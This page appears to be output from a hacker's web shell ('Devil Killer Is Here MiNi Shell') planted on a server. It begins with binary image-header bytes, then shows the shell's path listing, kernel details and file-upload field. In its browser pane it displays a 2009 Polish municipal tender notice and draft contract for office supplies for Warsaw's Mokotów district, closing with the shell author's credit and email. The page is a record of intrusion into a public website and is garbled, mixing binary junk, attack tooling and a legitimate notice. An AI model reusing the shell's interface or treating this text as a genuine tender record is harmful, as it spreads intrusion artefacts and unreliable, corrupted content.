JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090226/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20090226/42820-N-2009.html

<p class="kh_header"><b>Warszawa: Dostawa artykułów biurowych do magazynu Urzędu Dzielnicy Mokotów</b><br>
<b>Numer ogłoszenia: 42820 - 2009; data zamieszczenia: 26.02.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Stołeczne Warszawa Dzielnica Mokotów , ul. Rakowiecka 25/27, 02-517 Warszawa, woj. mazowieckie, tel. 022 5651562, faks 022 5651562.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mokotow.waw.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa artykułów biurowych do magazynu Urzędu Dzielnicy Mokotów.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Kategoria artykułów biurowych	Przedmiot zamówienia (opis)	J. M.	Ilość
1	2	3	4
Karton satynowany	 	 
A4	gramatura 160	ryza	250
Koperty	 	 	 
C-6	Małe białe sk. pak. po 1000 szt.	op.	75
C-5 	Średnie białe sk. pak. po 1000 szt.	op.	6
DL	Amerykanki sk. pak.po 1000 szt.	op.	25
C-5	Średnie szare sk. pak.po 1000 szt.	op.	35
C-4	Duże szare sk. pak.po 1000 szt.	op.	8
E-4	szare pak. po 1000 szt. rozszerzane dno	op.	1
Segregatory 	 	 	 
A4	A-4/5 z polipropylenu z okuciem, z mechanizmem, wymienna etykieta	szt.	800
A4	A-4/7 z polipropylenu z okuciem, z mechanizmem, wymienna etykieta	szt.	2300
Teczki - A4	 	 	 
 	Teczka foliowana z gumką - kolorowa	szt.	3000
 	Teczka wiązana biała tekturowa	szt.	7000
 	Teczka do podpisu min. 15 przegródek, winylowa, wnętrze z grubej barwionej tektury	szt.	20
Skorowidze	 	 	 
 	Formatu  A4 - twarda oprawa	szt.	20
 	Wąski - twarda oprawa (1/2 A4)	szt.	70
Skoroszyty	 	 	 
A4	Skoroszyt do segregatora-plastik	szt.	3500
A4	Skoroszyt z zawieszkami do segregatora tekturowy	szt.	500
A4	Skoroszyt z zawieszkami do segregatora tekturowy, 1/2 pierwszej strony	szt.	1000
A4	Skoroszyt plastik miękki	szt.	1500
A4	Skoroszt  kartonowy zwykły	szt.	48000
Koszulki na dokumenty	 	 
A5	wyk.z folii groszkowej pak. po 100 szt.	op.	5
A4	wyk.z folii groszkowej pak. po 100 szt.	op.	600
Długopisy	 	 	 
 	Dlugopis z klipsem - czarny, z wymiennym wkładem 0,7 mm-przezroczysta obudowa-metalowa końcówka-długośc linii pisania 1700 m 	szt.	500
 	Długopis niebieski i czarny jednorazowy, wentylowana skuwka w kolorze tuszu, grubość linii pisania 0,7 mm,długość linii pisania:min.2800m	szt.	300
 	Długopis na sprężynce samoprzylepny	szt.	200
 	Długopis żelowy z klipsem (czarny, niebieski - po 400) 	szt.	800
 	Wkład niebieski plastikowy do dlugopisu typu Zenith  	szt.	600
 	Wkład metalowy - niebieski do długopisu typu Zenith 	szt.	500
 	Wkłady standardowe plastikowe o długości 10,5 cm. z grubą końcówką	szt.	200
 	Wkłady długie , plastikowe	szt.	200
Zeszyty	 	 	 
A5	60k. kratka	szt.	100
A5	96k. kratka	szt.	100
A4	96k. - twarda oprawa	szt.	300
Bloczki do notatek	 	 
 	Samoprzylepny 51/38 żółty, 100 kartek	szt.	600
 	Samoprzylepny 51/76 żółty, 100 kartek	szt.	700
 	Samoprzylepny 76/127 żółty, 100 kartek	szt.	300
 	Bloki makulaturowe A4 - 100 kart.(białe kartki)	szt.	300
 	Bloki makulaturowe A5 - 100 kart.(białe kartki)	szt.	200
 	Kostka, sklejona ok. 450 kart, biała, wym. 76x76 mm	szt.	500
Korektory	 	 	 
 	z taśmą 	szt.	400
 	Płynny z pędzelkiem 20ml.	szt.	50
Cienkopis	Cienkopis jednorazowy z plastyczną końcówką odporną na nacisk, grubość linii pisania:0,5 mm-długość linii aż 1000 m (czarny,niebieski,czerwony,zielony) 	szt.	1000
Zszywacze	 	 	 
 	Duży, do 130 kartek 	szt.	50
 	na min.15 kartek	szt.	300
Rozszywacz	 	 	 
 	Do zszywek biurowych 	szt.	300
Zakreślacze	 	 	 
 	różne kolory, gr. linii 2-5 mm, ścięta końcówka	szt.	500
Dziurkacze	 	 	 
 	Średni z ogranicznikiem formatu, do 30 kartek	szt.	100
 	Duży - na 50 kartek	szt.	15
Kleje	 	 	 
 	W sztyfcie 8g	szt.	500
 	W płynie, pojemnoścć 40 ml.	szt.	500
Zszywki	 	 	 
 	24/6  pojed. opak.- po 1000 szt. w opakowaniu	op.	600
 	23/8  pojed. opak.- po 1000 szt. w opakowaniu	op.	300
Flamastry, markery	 	 
 	Flamastry czarne	szt.	450
 	Marker permanentny różne kolory, końcówka ścięta/czarny-240;nieb.-100;ziel.-100;czerw-60;	szt.	500
Papier faksowy	 	 	 
 	210/30 mm	rol.	36
Spinacze biurowe	 	 
 	Mały metalowy pak. po 100 szt / trójkątne	op.	800
 	Duże metalowe - 50 mm - pak. po 100 szt.	op.	300
Ołówki	 	 	 
 	Ołówki automatyczne 0,5 mm  hb	szt.	50
 	Grafit do ołówka aut. 0,5 mm  hb	op.	5
Obwoluty, ofertówki	 	 
A4	Obwoluta kopertowa, boczne zamknięcie, wykonana z folii groszkowej PP	szt.	200
A4	Ofertówka, przeźroczysta z foli PCV, otwarty górny i prawy brzeg - sztywna	szt.	1000
Taśma samoprzylepna	 	 
 	Taśma 18/20	szt.	500
 	Taśma 19/33- matowa, z możliwościa pisania na niej	szt.	50
 	Taśma szeroka - 48 mm. - szara	szt.	10
Nożyczki	 	 	 
 	 całe metalowe ,  14 cm.	szt.	50
 	min. 16 cm	szt.	200
Gumki	 	 	 
 	ołówkowe, białe	szt.	500
Klipsy do papieru	 	 
 	25mm opak. min 12 szt	op.	200
 	32 mm opak. min 12 szt	op.	200
 	51 mm opak. min 12 szt	op.	150
Przekładki kartonowe 	 	 
A4	Kolorowe do segregatora - 5 kolorów	op.	300
Papier pakowy	 	 	 
 	szary,w rolce - 50 ark.	rolka	1
Sznurek	 	 	 
 	0,5 kg. z tworzywa sztucznego	szt.	10
Nożyk do papieru	 	 
 	Wymienne ostrze	szt.	20
Taśma Dalton	 	 	 
 	57 mm - offsetowa	szt.	500
Tacki na dokumenty	 	 
 	lekkie - plastikowe-podłużne z możliwością ustawiania w stosy ,przezroczyste	szt.	200
Okladka PCV	 	 	 
A4	Przednia , bezbarwna ( opakowanie po 100 szt.)	op.	10
Karton Chromolux	 	 
A4	różne kolory - (opakowanie po 100 szt.)	op.	10
Folia do foliowania	 	 
A6	Opakowanie po 100 szt. - Grubość 80 mikronów	op.	2
A5	Opakowanie po 100 szt. - Grubość 80 mikronów	op.	2
A4	Opakowanie po 100 szt. - Grubość 80 mikronów	op.	5
A3	Opakowanie po 100 szt. - Grubość 80 mikronów	op.	3
Linijki	 	 	 
 	20 cm - plastikowe	szt.	200
 	30 cm - plastikowe	szt.	100
Grzbiety do bindowania	 	 
 	Średnica 7 mm - Opakowanie po 100 szt.	op.	1
 	Średnica 14 mm - Opakowanie po 100 szt.	op.	1
 	Średnica 16 mm - Opakowanie po 100 szt.	op.	1
Poduszka do stempli	 	 
 	nasączona czerwonym tuszem, 117 x 70 mm	szt.	50
Temperówka do ołówków	 	 
 	 z pojemnikiem	szt.	100
Przybornik biurowy	 	 
 	Wielofunkcyjny z przegródkami	szt.	50
Tusze do stempli	 	 	 
 	Czarny i czerwony - po 30 ml. 	poj.	120.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 30.19.20.00-1.</p>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 10.12.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> nie przewiduje się wniesienia wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają następujące warunki:
-posiadają uprawnienia do wykonywania określonej działalności lub czynności, 
jeżeli ustawy nakładają obowiązek posiadania takich uprawnień, 
-posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem 
technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia, 
-znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie 
zamówienia,
-nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 ust. 1 i 2 ustawy Prawo zamówień publicznych.
Opis sposobu dokonywania oceny spełniania tych warunków: 
Ocena spełniania warunków udziału w postępowaniu zostanie dokonana zgodnie
z formułą spełnia - nie spełnia w oparciu o oświadczenia lub dokumenty złożone przez wykonawcę w celu potwierdzenia spełniania warunków udziału w postępowaniu.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Wykaz oświadczeń lub dokumentów, jakie należy załączyć do oferty
w celu potwierdzenia spełniania warunków udziału w postępowaniu:
-oświadczenie wykonawcy o spełnianiu warunków udziału w postępowaniu (wzór druku załącznik nr 1 do wniosku)
-aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzające, że nie otwarto jego likwidacji ani nie ogłoszono upadłości wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
W przypadku składania oferty przez wykonawców występujących wspólnie, wyżej wymieniony dokument musi być złożony przez każdego wykonawcę..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> licytacja elektroniczna.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.6) Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:</b> http://aukcje.um.warszawa.pl</p>
<p><b>IV.3.7) Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:</b> www.mokotow.waw.pl</p>
<p><b>IV.3.8) Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:</b> 1. Wykonawca ma prawo złożyć tylko jeden wniosek. o dopuszczenie do udziału w licytacji elektronicznej. Złożenie większej liczby wniosków, spowoduje odrzucenie wszystkich wniosków złożonych przez danego Wykonawcę.
2. Wniosek oraz wszelkie dokumenty wymagane muszą spełniać następujące wymogi:
a)	wniosek musi zostać sporządzony w języku polskim z zachowaniem formy pisemnej na maszynie do pisania, komputerze, ręcznie długopisem czytelnym pismem.
b)	formularz wniosku i wszystkie załączane dokumenty sporządzone przez Wykonawcę muszą być podpisane; za podpisanie uznaje się własnoręczny podpis z pieczątką imienną przez osobę(-y) upoważnioną(-e) do reprezentowania zgodnie z formą reprezentacji Wykonawcy określoną w dokumencie rejestrowym lub innym dokumencie, właściwym dla formy organizacyjnej,
c)	w przypadku, gdy Wykonawcę reprezentuje pełnomocnik do wniosku musi być załączone pełnomocnictwo, określające jego zakres i podpisane przez osoby uprawnione do reprezentacji Wykonawcy, pełnomocnictwo musi być złożone w oryginale lub notarialnie poświadczonej kopi 
d)	pozostałe oświadczenia i dokumenty  muszą być oryginałami lub kserokopiami poświadczonymi na każdej stronie za zgodność z oryginałem przez właściwą osobę(-y), zgodnie z zasadą  oraz muszą być one sporządzone w języku polskim,  
e)	poprawki lub zmiany (również przy użyciu korektora) we wniosku, powinny być parafowane własnoręcznie przez osobę (-y) podpisującą(-e) wniosek,
f)	dokumenty składające się na wniosek muszą być sporządzone wg wzorów i wymogów ,
g)	dokumenty sporządzone w języku obcym, muszą być składane wraz z ich tłumaczeniem na język polski, poświadczonym przez Wykonawcę
Wzór wniosku o dopuszczenie do udziału w licytacji elektronicznej ( załącznik do treści ogłoszenia ) dostępny na stronie www.mokotow.waw.pl
Wniosek wraz z załącznikami  należy złożyć w zamkniętej kopercie opatrzonej co najmniej  nazwą przedmiotu zamówienia. 
3. Komputer użytkownika powinien spełniać następujące wymagania:
-być wyposażony w procesor 733 MHz i posiadać co najmniej 512 MB pamięci RAM
-posiadać zainstalowany system operacyjny MS Windows XP lub nowszy
-posiadać zainstalowaną przeglądarkę internetową Microsoft Internet Explorer 6.0. lub nowszą albo Mozilla Firefox 2.x lub nowszą
- posiadać połączenie z siecią Internet o szybkości transmisji nie mniejszej niż 128 kb/s..</p>
<p><b>IV.3.9) Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:</b> W trakcie licytacji Wykonawca podaje cenę brutto (z VAT) za wykonanie całego zamówienia. W toku licytacji elektronicznej Zamawiający na bieżąco przekazuje wszystkim wykonawcom informacje o pozycji składanych przez nich ofert, liczbie wykonawców biorących udział w licytacji, także o cenach złożonych przez nich ofert, z tym, że do momentu zamknięcia licytacji elektronicznej nie ujawnia informacji umożliwiających identyfikację Wykonawców. 
  Cena ofertowa winna obejmować wszystkie koszty i składniki wraz z narzutami, niezbędne do wykonania przedmiotu zamówienia. Zamawiający nie zapewnia zwolnienia Wykonawcy z żadnych podatków, opłat, ani nie będzie zwracał żadnych kar należnych z jakiegokolwiek tytułu, cen transportu, czynności, usług, świadczeń, opłat, ceł, podatków itp.,  Ryzyko konieczności wykonania wszelkich prac towarzyszących, mogących pojawić się w trakcie realizacji zamówienia, ryzyko związane ze zmianami kursów walut, ceł itp., obciąża Wykonawcę i należy uwzględnić je w ofercie.
   Zaproponowana przez Wykonawcę  cena będzie stała w czasie objętym umową. Zapłata nastąpi zgodnie z warunkami umowy. 
Za ofertę najkorzystniejszą zostanie uznana oferta, która zawierać będzie, w chwili zamknięcia licytacji elektronicznej, najniższą cenę brutto realizacji całego zamówienia. Wykonawca, który zaproponował najniższą cenę brutto realizacji przedmiotowego zamówienia, zostaje zwycięzcą licytacji elektronicznej.
  Operator platformy aukcyjnej przekazuje zakwalifikowanym przez Zamawiającego Wykonawcom informację o sposobie rejestracji na platformie aukcyjnej. W trakcie rejestracji Wykonawca otrzyma kod dostępu do platformy aukcyjnej. Otrzymany kod dostępu Wykonawca będzie musiał zmienić na nowy - określony przez siebie. 
Minimalna wysokość postąpienia wynosi 0,5 % ceny wywoławczej. Cena wywoławcza  85.395,12 zł.
Zamawiający podpisze umowę, z Wykonawcą, który w chwili zamykania licytacji elektronicznej zaproponował najniższą cenę realizacji przedmiotowego zamówienia. 
Po zamknięciu licytacji elektronicznej, w terminie wyznaczonym przez Zamawiającego, Wykonawca, który został zwycięzcą licytacji elektronicznej ma obowiązek przekazać Zamawiającemu: wypełniony formularz ofertowy, który będzie stanowił załącznik nr 1 do wzoru umowy.
Ceny jednostkowe w formularzu ofertowym mają zostać określone tak, aby łączna wartość zamówienia wynikająca z przemnożenia cen jednostkowych i ilości nie przekroczyła wartości wylicytowanej.
Wszystkie ceny muszą być wyrażone z dokładnością do dwóch miejsc po przecinku w rozumieniu ustawy z dnia 5 lipca 2001 r. o cenach (Dz. U. z 2002r. Nr 97, poz. 1050, ze zm.) oraz ustawy z dnia 7 lipca 1994 r. o denominacji złotego (Dz. U. z 1994 r., Nr 84, poz. 386 ze zm.).
O miejscu i terminie zawarcia umowy Wykonawca zostanie poinformowany przez Zamawiającego po dostarczeniu w/w dokumentu..</p>
<p><b>IV.3.10) Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania:</b><br>
<ul class="kh_indent_1"><li>
<table>
<tr><td style="font-size: 10pt;"><b>etap nr</b></td><td width="20px;"><td style="font-size: 10pt;"><b>czas trwania etapu</b></td></tr>
<tr><td valign="top" style="font-size: 10pt;">1</td><td></td><td style="font-size: 10pt;">20 min</td></tr>
</table></li></ul>
<p><b>Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną <i>zakwalifikowani</i> do następnego etapu?</b> nie.</p>
<p><b>IV.3.11) Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej:</b> 09.03.2009 godzina 09:30, miejsce: siedziba zamawiającego pokój 110.</p>
<p><b>IV.3.12) Termin otwarcia licytacji elektronicznej:</b> 18.03.2009 r godz.09:00.</p>
<p><b>Termin zamknięcia licytacji elektronicznej:</b> 18.03.2009 r. godz. 09:20.</p>
<p><b>Warunki zamknięcia licytacji elektronicznej:</b> Podstawowy czas licytacji 20 minut.
Warunki zamknięcia licytacji elektronicznej (jeżeli dotyczy): Zamawiający zamyka licytację gdy w podstawowym czasie nie zostanie złożona żadna oferta lub, gdy w ciągu 5 minut od złożenia oferty przez jednego z wykonawców nie zostanie złożona inna oferta, jednakże nie wcześniej niż po upływie 20 minut od otwarcia licytacji..</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Wzór umowy:                             
U M O W A

zawarta w dniu..................... w Warszawie
pomiędzy: Miastem Stołecznym Warszawa Dzielnica Mokotów z siedzibą w Warszawie przy ul. Rakowieckiej 25/27, zwanym w dalszej części Zamawiającym, reprezentowanym  na podstawie pełnomocnictwa Prezydenta m.st. Warszawy z dnia ........................ Nr .............................................. przez:
.................................................................................................
a
 
Panem ........................................ zamieszkałym w .................................... przy ulicy ..........................................., prowadzącym firmę pod nazwą ................................. z siedzibą w ....................................... ul. ........................................................, wpisaną do ........................................,  zwanym dalej WYKONAWCĄ  REGON: ............................. NIP: ......................................,  który wyłoniony został w postępowaniu o udzielenie zamówienia publicznego w trybie .................................................................... , o następującej treści:

§ 1
1.	Przedmiotem umowy jest dostawa artykułów biurowych do magazynu Urzędu Dzielnicy Mokotów, ul. Rakowiecka 25/27, zgodnie z  formularzem ofertowym  stanowiącym Załącznik nr 1 do umowy.
2.	Dostawy wykonywane będą sukcesywnie. Termin realizacji umowy do 10.12.2009 r.

§ 2
1.	Wszelkie koszty dostawy artykułów biurowych ponosi Wykonawca.
2.	Dostawy realizowane będą w ciągu 5 dni roboczych od daty częściowego zamówienia ilościowego asortymentu. O terminach dostaw Zamawiający informować będzie Wykonawcę telefonicznie, tel. nr: ................., lub faksem: nr : ............................, nie później niż 5 dni roboczych przed terminem dostawy.
3.	Wykonawca, w przypadku stwierdzenia wad przez Zamawiającego w dostarczonych artykułach biurowych jest zobowiązany w terminie 5 dni od daty stwierdzenia wad potwierdzonych protokołem sporządzonym przez przedstawicieli obu stron umowy, wymienić wadliwy towar na wolny od wad. 

§ 3
1.	Wartość za wykonanie przedmiotu umowy, o którym mowa w § 1ustala się w wysokości nie przekraczającej kwoty łącznej brutto zł.:....................................... ( słownie:          ), w tym podatek VAT w wysokości 22%, tj. w kwocie zł.:...........................................
2.	Ostateczna wysokość wynagrodzenia, o którym mowa w ust. 1, wynikać będzie z ilości faktycznie dostarczonego przez Wykonawcę asortymentu przemnożonej przez ceny jednostkowe określone w Formularzu ofertowym stanowiącym załącznik nr 1 do umowy i nie przekroczy kwoty określonej w ust.1.
3.	Ceny jednostkowe przez cały okres realizacji przedmiotu umowy, nie ulegną podwyższeniu.
4.	Płatności mogą być dokonywane sukcesywnie na podstawie faktur częściowych.
5.	Uregulowanie należności za wykonaną część umowy nastąpi, po przyjęciu przedmiotu zamówienia bez zastrzeżeń przez przedstawiciela Wydziału Administracyjno- Gospodarczego dla Dzielnicy Mokotów, dowodem przyjęcia podpisanym przez przedstawiciela Zamawiającego, na podstawie prawidłowo wystawionej faktury, przelewem w ciągu 21 dni od daty jej otrzymania przez Zamawiającego. W miesiącu grudniu 2009 r. Dostawca jest zobowiązany do wystawienia faktury w dniu przyjęcia przez Zamawiającego ostatniej dostawy, nie później niż 10.12.2009 r.
6.	Za asortymenty nie dostarczone przez Wykonawcę, wynagrodzenie nie przysługuje.
7.	Faktury VAT będą wystawiane w następujący sposób:
1) Nabywca: Miasto Stołeczne Warszawa, 00-950 Warszawa, Pl. Bankowy 3/5, NIP 525 22 48-481,
a dostarczane do
2) Odbiorcy (płatnika): Urząd Miasta Stołecznego Warszawy Dzielnica Mokotów, 02-517 Warszawa, ul. Rakowiecka 25/27.
§ 4
1.	W przypadku zwłoki zaistniałej w okolicznościach, o których mowa w § 2 ust. 2 w dostawie części danego zamówienia, Zamawiający naliczy Dostawcy kary umowne w wysokości 0,2% wartości brutto danego zamówienia za każdy dzień zwłoki licząc od terminów określonych w § 2 ust. 2.
2.	W przypadku odstąpienia od umowy z winy Wykonawcy , zapłaci on karę umowną w wysokości 20% wartości umowy brutto określonej w § 3 ust. 1.
3.	Wykonawca, w przypadku odstąpienia od umowy przez Zamawiającego z winy Wykonawcy  nie będzie obciążał Zamawiającego kosztami wynikającymi z nie zrealizowanej części umowy.
4.	Wykonawca wyraża zgodę na potracenie kar z należnego wynagrodzenia. 
5.	Zapłata kary umownej nie zwalnia Wykonawcy od odpowiedzialności odszkodowawczej na zasadach ogólnych określonych w Kodeksie Cywilnym.
§ 5
1.	W razie zaistnienia istotnej zmiany okoliczności powodującej, że wykonanie umowy nie leży w interesie publicznym, czego nie można było przewidzieć w chwili zawarcia umowy, Zamawiający może odstąpić od umowy w terminie 7 dni od powzięcia wiadomości o tych okolicznościach. 
2.	Poza przypadkami przewidzianymi w obowiązujących przepisach prawa, Zamawiający może odstąpić od umowy z winy Wykonawcy także w razie
     rażącego naruszenia obowiązków umownych przez Wykonawcę.
3.	Odstąpienie od umowy wymaga formy pisemnej pod rygorem nieważności.
4.	Z tytułów o których mowa w ust. 2 i 3 Wykonawca nie będzie dochodził od Zamawiającego żadnych roszczeń finansowych z tytułu nie zrealizowanej części umowy.
5.	W sprawach nie uregulowanych niniejszą umową obowiązują przepisy:
1) ustawy z dn.29.01.2004 r. Prawo zamówień publicznych (Dz.U. z 2007r. Nr 223 poz. 1655 z późn. zm.),
2) Kodeksu Cywilnego
6.	Strony zgodnie oświadczają, że do rozstrzygnięcia sporu powstałego w wyniku realizacji niniejszej umowy będzie Sąd właściwy dla siedziby Zamawiającego.
7.	Umowę sporządzono w trzech jednobrzmiących egzemplarzach:
- 1 egz. dla Wykonawcy
- 2 egz. dla Zamawiającego

WYKONAWCA 						ZAMAWIAJACY

Creat By MiNi SheLL
Email: jattceo@gmail.com